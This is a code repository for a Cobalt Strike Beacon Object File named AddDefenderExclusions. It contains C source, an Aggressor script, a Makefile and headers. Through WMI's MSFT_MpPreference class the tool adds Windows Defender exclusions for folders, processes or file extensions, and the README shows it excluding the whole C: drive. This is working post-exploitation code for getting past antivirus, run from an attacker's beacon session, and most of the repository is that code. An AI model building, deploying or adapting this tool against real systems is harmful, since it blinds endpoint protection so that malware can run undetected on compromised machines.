├── AddDefenderExclusions.c ├── AddDefenderExclusions.cna ├── AddDefenderExclusions.x64.o ├── AddDefenderExclusions.x86.o ├── Makefile.ADD ├── README.md └── headers ├── beacon.h └── win32.h /AddDefenderExclusions.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "headers/beacon.h" 5 | #include "headers/win32.h" 6 | #pragma comment(lib, "wbemuuid.lib") 7 | 8 | #define FOLDER_EXCLUSIONS L"ExclusionPath" 9 | #define PROCESS_EXCLUSIONS L"ExclusionProcess" 10 | #define EXTENSION_EXCLUSIONS L"ExclusionExtension" 11 | 12 | 13 | 14 | INT AddDefenderExclusions(int option, wchar_t* value) 15 | { 16 | 17 | const wchar_t* options[] = { FOLDER_EXCLUSIONS, PROCESS_EXCLUSIONS, EXTENSION_EXCLUSIONS }; 18 | 19 | HRESULT hr; 20 | 21 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Get args: %d %ws", option, value); 22 | if(option>3) 23 | { 24 | BeaconPrintf(CALLBACK_ERROR, "[-] no option found: %d", option); 25 | return 0; 26 | } 27 | 28 | BeaconPrintf(CALLBACK_OUTPUT, "[+] CoInitialize..."); 29 | hr = OLE32$CoInitializeEx(0, COINIT_MULTITHREADED); 30 | if (FAILED(hr)) 31 | { 32 | BeaconPrintf(CALLBACK_ERROR, "[-] CoInitializeEx has failed: %08x", hr); 33 | return 0; 34 | } 35 | 36 | BeaconPrintf(CALLBACK_OUTPUT, "[+] CoInitializeSecurity..."); 37 | hr = OLE32$CoInitializeSecurity( 38 | NULL, 39 | -1, 40 | NULL, 41 | NULL, 42 | RPC_C_AUTHN_LEVEL_DEFAULT, 43 | RPC_C_IMP_LEVEL_IMPERSONATE, 44 | NULL, 45 | EOAC_NONE, 46 | NULL 47 | ); 48 | if (FAILED(hr)) 49 | { 50 | BeaconPrintf(CALLBACK_ERROR, "[-] CoInitializeSecurity has failed: %08x\n", hr); 51 | OLE32$CoUninitialize(); 52 | return 0; 53 | } 54 | 55 | BeaconPrintf(CALLBACK_OUTPUT, "[+] CoCreateInstance CLSID_WbemLocator..."); 56 | IWbemLocator* pLoc = 0; 57 | hr = OLE32$CoCreateInstance(g_CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, g_IID_IWbemLocator, (LPVOID*)&pLoc); 58 | if (FAILED(hr)) 59 | { 60 | BeaconPrintf(CALLBACK_ERROR, "[-] CoCreateInstance has failed: %08x", hr); 61 | OLE32$CoUninitialize(); 62 | return 0; 63 | } 64 | 65 | BeaconPrintf(CALLBACK_OUTPUT, "[+] ConnectServer..."); 66 | IWbemServices* pSvc = 0; 67 | hr = pLoc->ConnectServer(L"ROOT\\Microsoft\\Windows\\Defender", NULL, NULL, 0, NULL, 0, 0, &pSvc); 68 | if (FAILED(hr)) 69 | { 70 | BeaconPrintf(CALLBACK_ERROR, "[-] ConnectServer has failed: %08x", hr); 71 | pLoc->Release(); 72 | OLE32$CoUninitialize(); 73 | return 0; 74 | } 75 | 76 | BeaconPrintf(CALLBACK_OUTPUT, "[+] CoSetProxyBlanket..."); 77 | hr = OLE32$CoSetProxyBlanket( 78 | pSvc, 79 | RPC_C_AUTHN_WINNT, 80 | RPC_C_AUTHZ_NONE, 81 | NULL, 82 | RPC_C_AUTHN_LEVEL_CALL, 83 | RPC_C_IMP_LEVEL_IMPERSONATE, 84 | NULL, 85 | EOAC_NONE 86 | ); 87 | if (FAILED(hr)) 88 | { 89 | BeaconPrintf(CALLBACK_ERROR, "[-] CoSetProxyBlanket has failed: %08x", hr); 90 | pSvc->Release(); 91 | pLoc->Release(); 92 | OLE32$CoUninitialize(); 93 | return 0; 94 | } 95 | 96 | BeaconPrintf(CALLBACK_OUTPUT, "[+] GetObject..."); 97 | IWbemClassObject* pClass = 0; 98 | BSTR Clname = L"MSFT_MpPreference"; 99 | hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL); 100 | 101 | BeaconPrintf(CALLBACK_OUTPUT, "[+] GetMethod..."); 102 | BSTR MethodName = L"Add"; 103 | IWbemClassObject* pInSignature = 0; 104 | hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL); 105 | if (FAILED(hr)) 106 | { 107 | BeaconPrintf(CALLBACK_ERROR, "[-] GetMethod has failed: %08x", hr); 108 | pInSignature->Release(); 109 | pClass->Release(); 110 | pSvc->Release(); 111 | pLoc->Release(); 112 | OLE32$CoUninitialize(); 113 | return 0; 114 | } 115 | 116 | BeaconPrintf(CALLBACK_OUTPUT, "[+] SpawnInstance..."); 117 | IWbemClassObject* pClassInstance = NULL; 118 | hr = pInSignature->SpawnInstance(0, &pClassInstance); 119 | if (FAILED(hr)) 120 | { 121 | BeaconPrintf(CALLBACK_ERROR, "SpawnInstance has failed: %08x", hr); 122 | pClassInstance->Release(); 123 | pInSignature->Release(); 124 | pClass->Release(); 125 | pSvc->Release(); 126 | pLoc->Release(); 127 | OLE32$CoUninitialize(); 128 | return 0; 129 | } 130 | 131 | // Create an array 132 | SAFEARRAYBOUND rgsaBounds[1]; 133 | rgsaBounds[0].cElements = 1; 134 | rgsaBounds[0].lLbound = 0; 135 | SAFEARRAY* psaStrings; 136 | psaStrings = OLEAUT32$SafeArrayCreate(VT_BSTR, 1, rgsaBounds); 137 | 138 | // Add a string to the array 139 | VARIANT vString; 140 | OLEAUT32$VariantInit(&vString); 141 | V_VT(&vString) = VT_BSTR; 142 | V_BSTR(&vString) = OLEAUT32$SysAllocString(value); 143 | LONG lArrayIndex = 0; 144 | OLEAUT32$SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString)); 145 | OLEAUT32$VariantClear(&vString); 146 | // variant array 147 | VARIANT vStringList; 148 | OLEAUT32$VariantInit(&vStringList); 149 | V_VT(&vStringList) = VT_ARRAY | VT_BSTR; 150 | V_ARRAY(&vStringList) = psaStrings; 151 | 152 | //BeaconPrintf(CALLBACK_OUTPUT, "[+] Put Exclusion..."); 153 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Put %ws...",options[option-1]); 154 | 155 | hr = pClassInstance->Put(options[option-1], 0, &vStringList, CIM_STRING | CIM_FLAG_ARRAY); 156 | if (FAILED(hr)) 157 | { 158 | BeaconPrintf(CALLBACK_ERROR, "[-] Put has failed: %08x", hr); 159 | OLEAUT32$VariantClear(&vStringList); 160 | pClassInstance->Release(); 161 | pInSignature->Release(); 162 | pClass->Release(); 163 | pSvc->Release(); 164 | pLoc->Release(); 165 | OLE32$CoUninitialize(); 166 | return 0; 167 | } 168 | 169 | IWbemClassObject* pOutParams = NULL; 170 | BeaconPrintf(CALLBACK_OUTPUT, "[+] ExecMethod..."); 171 | hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL); 172 | if (FAILED(hr)) 173 | { 174 | BeaconPrintf(CALLBACK_ERROR, "[-] ExecMethod has failed: %08x", hr); 175 | OLEAUT32$VariantClear(&vStringList); 176 | pClassInstance->Release(); 177 | pInSignature->Release(); 178 | pClass->Release(); 179 | pSvc->Release(); 180 | pLoc->Release(); 181 | OLE32$CoUninitialize(); 182 | return 0; 183 | } 184 | 185 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Success!"); 186 | 187 | OLEAUT32$VariantClear(&vStringList); 188 | pClassInstance->Release(); 189 | pInSignature->Release(); 190 | pClass->Release(); 191 | pLoc->Release(); 192 | pSvc->Release(); 193 | OLE32$CoUninitialize(); 194 | 195 | return 1; 196 | } 197 | 198 | extern "C" void go(char* buff, int len) 199 | { 200 | datap dpParser; 201 | wchar_t* value; 202 | 203 | BeaconDataParse(&dpParser, buff, len); 204 | 205 | int iEnumerationOption = BeaconDataInt(&dpParser); 206 | value = (wchar_t*)BeaconDataExtract(&dpParser, NULL); 207 | int res = AddDefenderExclusions(iEnumerationOption,value); 208 | if (!res) 209 | { 210 | BeaconPrintf(CALLBACK_ERROR, "[-] AddDefenderExclussion has failed"); 211 | } 212 | else { 213 | BeaconPrintf(CALLBACK_OUTPUT, "[+] AddDefenderExclussion has Success!"); 214 | } 215 | 216 | 217 | return; 218 | } -------------------------------------------------------------------------------- /AddDefenderExclusions.cna: -------------------------------------------------------------------------------- 1 | alias AddDefenderExclusions { 2 | local('$barch $handle $data $args'); 3 | 4 | if(size(@_) != 3) 5 | { 6 | berror($1, "Incorrect usage!"); 7 | berror($1, beacon_command_detail("AddDefenderExclusions")); 8 | return; 9 | } 10 | 11 | # figure out the arch of this session 12 | $barch = barch($1); 13 | 14 | # read in the right BOF file 15 | println(script_resource("AddDefenderExclusions. $+ $barch $+ .o")); 16 | $handle = openf(script_resource("AddDefenderExclusions. $+ $barch $+ .o")); 17 | $data = readb($handle, -1); 18 | closef($handle); 19 | 20 | # pack our arguments 21 | $args = bof_pack($1, "iZ", $2,$3); 22 | 23 | # announce what we're doing 24 | btask($1, "Running AddDefenderExclusions BOF"); 25 | 26 | # execute it. 27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "AddDefenderExclusions", 32 | "Add Defender Exclusions via com object", 33 | "Synopsis: AddDefenderExclusions 1 C:\\ 34 | You must supply an argument between 1 and 3.\n 35 | 1: Folder exclusions\n 36 | 2: Process exclusions\n 37 | 3: Extension exclusions."); -------------------------------------------------------------------------------- /AddDefenderExclusions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Like0x/AddDefenderExclusions-BOF/83fba4a2356ffa9cf686aef7dce472a9056c15ff/AddDefenderExclusions.x64.o -------------------------------------------------------------------------------- /AddDefenderExclusions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Like0x/AddDefenderExclusions-BOF/83fba4a2356ffa9cf686aef7dce472a9056c15ff/AddDefenderExclusions.x86.o -------------------------------------------------------------------------------- /Makefile.ADD: -------------------------------------------------------------------------------- 1 | BOFNAME := AddDefenderExclusions 2 | 3 | CC_x64 := x86_64-w64-mingw32-g++ 4 | CC_x86 := i686-w64-mingw32-g++ 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | 8 | all: 9 | $(CC_x64) -Wno-write-strings -o $(BOFNAME).x64.o -c $(BOFNAME).c -masm=intel 10 | $(STRIP_x64) --strip-unneeded $(BOFNAME).x64.o 11 | 12 | $(CC_x86) -Wno-write-strings -o $(BOFNAME).x86.o -c $(BOFNAME).c -masm=intel 13 | $(STRIP_x86) --strip-unneeded $(BOFNAME).x86.o 14 | 15 | clean: 16 | rm -f ../dist/$(BOFNAME).x64.o 17 | rm -f ../dist/$(BOFNAME).x86.o -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AddDefenderExclusions-BOF 2 | AddDefenderExclusions Beacon Object File 3 | 4 | ``` 5 | make -f Makefile.ADD 6 | ``` 7 | load cna 8 | 9 | ``` 10 | AddDefenderExclusions 1 C:\ 11 | ``` 12 | You must supply an argument between 1 and 3. 13 | 14 | 1: Folder exclusions 15 | 16 | 2: Process exclusions 17 | 18 | 3: Extension exclusions. 19 | 20 | ![image](https://github.com/Like0x/AddDefenderExclusions-BOF/assets/19629138/9624c6c8-32b7-4606-8f9e-3a621b5eb9b9) 21 | 22 | ## References 23 | https://cloud.tencent.com/developer/article/1900214 24 | 25 | https://github.com/EspressoCake/Defender_Exclusions-BOF 26 | -------------------------------------------------------------------------------- /headers/beacon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | extern "C" { 3 | #include 4 | 5 | typedef struct { 6 | char * original; /* the original buffer [so we can free it] */ 7 | char * buffer; /* current pointer into our buffer */ 8 | int length; /* remaining length of data */ 9 | int size; /* total size of this buffer */ 10 | } datap; 11 | 12 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 13 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 14 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 15 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 16 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 17 | 18 | /* format API */ 19 | typedef struct { 20 | char * original; /* the original buffer [so we can free it] */ 21 | char * buffer; /* current pointer into our buffer */ 22 | int length; /* remaining length of data */ 23 | int size; /* total size of this buffer */ 24 | } formatp; 25 | 26 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 27 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 28 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 29 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 30 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 31 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 32 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 33 | 34 | /* Output Functions */ 35 | #define CALLBACK_OUTPUT 0x0 36 | #define CALLBACK_OUTPUT_OEM 0x1e 37 | #define CALLBACK_ERROR 0x0d 38 | #define CALLBACK_OUTPUT_UTF8 0x20 39 | 40 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 41 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 42 | 43 | /* Token Functions */ 44 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 45 | DECLSPEC_IMPORT void BeaconRevertToken(); 46 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 47 | 48 | /* Spawn+Inject Functions */ 49 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 50 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 51 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 52 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 53 | 54 | /* Utility Functions */ 55 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 56 | } -------------------------------------------------------------------------------- /headers/win32.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 9 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit); 10 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities); 11 | extern "C" DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize (void); 12 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3); 13 | extern "C" DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 14 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR); 15 | extern "C" DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SysStringLen(BSTR); 16 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest,VARIANTARG *pvarSrc,USHORT wFlags,VARTYPE vt); 17 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg); 18 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg); 19 | extern "C" DECLSPEC_IMPORT int WINAPI SHLWAPI$StrCmpW (PCWSTR psz1, PCWSTR psz2); 20 | extern "C" DECLSPEC_IMPORT PCWSTR WINAPI SHLWAPI$StrStrW (PCWSTR pszFirst, PCWSTR pszSrch); 21 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa); 22 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa); 23 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound); 24 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound); 25 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv); 26 | extern "C" DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa); 27 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData); 28 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa); 29 | extern "C" DECLSPEC_IMPORT SAFEARRAY * __stdcall WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND *rgsabound); 30 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY *psa, LONG *rgIndices, void * pv); 31 | 32 | extern "C" { 33 | static GUID g_CLSID_WbemLocator = { 0x4590f811, 0x1d3a, 0x11d0, { 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 34 | static GUID g_IID_IWbemLocator = { 0xdc12a687, 0x737f, 0x11cf, { 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 35 | } --------------------------------------------------------------------------------